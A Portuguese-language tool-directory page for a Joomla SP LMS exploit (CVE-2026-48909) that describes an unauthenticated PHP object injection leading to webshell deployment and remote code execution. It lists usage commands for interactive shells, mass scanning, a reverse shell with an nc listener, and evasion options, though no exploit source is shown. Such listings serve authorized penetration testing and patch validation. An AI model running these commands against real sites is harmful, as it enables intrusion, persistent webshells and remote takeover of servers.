Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Exploit de injeção de objetos PHP não autenticada para RCE na extensão SP LMS do Joomla, versões <= 4.1.3. Explora a desserialização do cookie lmsOrders para gravar um webshell por meio da cadeia de gadgets Joomla FormattedtextLogger. Inclui shell interativo, descoberta de caminhos e limpeza. Apenas para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Análise de VulnerabilidadesAnálise de CódigoExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming
Desenvolvimento de Payloads
Labs e Prática
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Ver Repositório
215há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-48909 - Exploit de injeção de objetos PHP não autenticada para RCE na extensão SP LMS do Joomla, versões <= 4.1.3. Explora a desserialização do cookie lmsOrders para gravar um webshell por meio da cadeia de gadgets Joomla FormattedtextLogger. Inclui shell interativo, descoberta de caminhos e limpeza. Apenas para testes de segurança autorizados.

Compartilhar

CVE-2026-48909

Joomla SP LMS — Injeção de Objeto PHP Não Autenticada → RCE

Python Version CVSS License Platform

Ferramenta de prova de conceito para CVE-2026-48909
Autor: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Uso autorizado apenas. Esta ferramenta destina-se a pesquisa em segurança, educação e teste de sistemas que você possui ou para os quais possui permissão explícita por escrito. O acesso não autorizado a sistemas informáticos é ilegal. O autor não assume qualquer responsabilidade por uso indevido.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Funcionalidades
  • Instalação
  • Início Rápido
  • Guia de Uso
  • Referência de Comandos
  • Tipos de Payload
  • Cadeia de Ataque
  • Exemplos de Saída
  • Resolução de Problemas
  • Estrutura do Repositório
  • Histórico de Versões
  • Aviso Legal
  • Autor

Visão Geral

CVE-2026-48909 é uma Injeção de Objeto PHP não autenticada crítica na extensão SP LMS do Joomla. Esta ferramenta implementa a cadeia de ataque completa para que profissionais de segurança possam validar o impacto em ambientes de laboratório ou autorizados.

Ela cobre detecção, descoberta de caminhos, entrega de payload, pós-exploração interativa (quando permitido), avaliação em massa e limpeza opcional.


Detalhes da Vulnerabilidade

AtributoValor
ID CVECVE-2026-48909
CVSS9.5 (Crítico)
Vetor de AtaqueRede — não autenticado
ImpactoExecução Remota de Código
Produto AfetadoJoomla SP LMS
Versões Afetadas1.0.0 – 4.1.3
Versão CorrigidaSP LMS 4.1.4+
Cadeia de GadgetsRequer Joomla < 5.2.2

Matriz de Compatibilidade

ComponenteVersãoRCE
SP LMS< 4.1.4Vulnerável
SP LMS≥ 4.1.4Corrigido
Joomla< 5.2.2Cadeia de gadgets utilizável
Joomla≥ 5.2.2Cadeia de gadgets corrigida

Funcionalidades

Núcleo

CapacidadeDescrição
Exploit não autenticadoNenhuma credencial necessária
Múltiplos payloads7 variantes de webshell / execução
Shell interativoSessão com histórico de comandos após implantação
Descoberta de caminhoSondagem automática de caminhos graváveis
LimpezaRemove webshell implantado após os testes

Avaliação & Operações

CapacidadeDescrição
Varredura em massaListas de alvos com múltiplas threads (1000+)
Suporte a proxyHTTP/SOCKS (Burp, ZAP, etc.)
Reverse shellPayloads baseados em listener
Modo furtivoCanais de comando via cabeçalho / POST
RandomizaçãoNomes de shell com UUID, rotação de User-Agent
RelatóriosExportar como JSON, HTML ou CSV
Auxílios de detecçãoVerificações de versão do Joomla, --check-only, --safe-mode

Notas de Evasão

  • Evita caracteres bloqueados pelo filtro cmd do Joomla quando possível
  • Caminho de escrita PHP codificado em hex para reduzir problemas com padding base64 / barras
  • Atrasos configuráveis e rotação de User-Agents
  • Lógica de retry em múltiplos candidatos de injeção / caminho

Instalação

Pré-requisitos

  • Python 3.6+
  • pip
  • Acessibilidade de rede ao(s) alvo(s) em teste

Configuração

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Dependências

requests>=2.31.0
urllib3>=2.0.0

argparse acompanha a biblioteca padrão do Python; não precisa ser instalado via pip.


Início Rápido

Substitua https://target.example por um alvo de laboratório ou autorizado apenas.

Alvo único — descobrir caminho + shell interativo

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Verificações seguras (sem exploração)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Varredura em massa

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Reverse shell (laboratório autorizado)

# Listener
nc -lvnp 4444

# Host do exploit
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Guia de Uso

Descoberta de caminho

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Caminho gravável conhecido

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Sessão interativa

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Comando único

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Payload furtivo + interativo

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Limpeza

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Formato da lista de alvos

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Referência de Comandos

Alvo

ArgumentoDescrição
targetURL do alvo único
--targets, -T FILEArquivo com alvos (uma URL por linha)
--path PATHCaminho absoluto no servidor para o webshell
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMENome do arquivo do webshell (padrão: x.php)

Rede

ArgumentoDescrição
--timeout SECONDSTimeout da requisição (padrão: 15)
--insecureIgnorar verificação de certificado TLS
--proxy URLEx.: http://127.0.0.1:8080
--random-uaRotacionar User-Agent (ativado por padrão)
--delay SECONDSAtraso entre requisições

Reverse shell

ArgumentoDescrição
--reverse-host HOSTHost do listener
--reverse-port PORTPorta do listener

Modos

ArgumentoDescrição
--interactive, -iShell interativo após implantação
--check-onlyApenas verificação de vulnerabilidade
--safe-modeTeste não destrutivo
--find-pathDescobrir automaticamente caminho gravável
--cmd COMMANDExecutar um comando e sair
--cleanup PATHRemover webshell no caminho
--cleanup-afterLimpar após exploração

Varredura em massa / relatório

Baixar ferramenta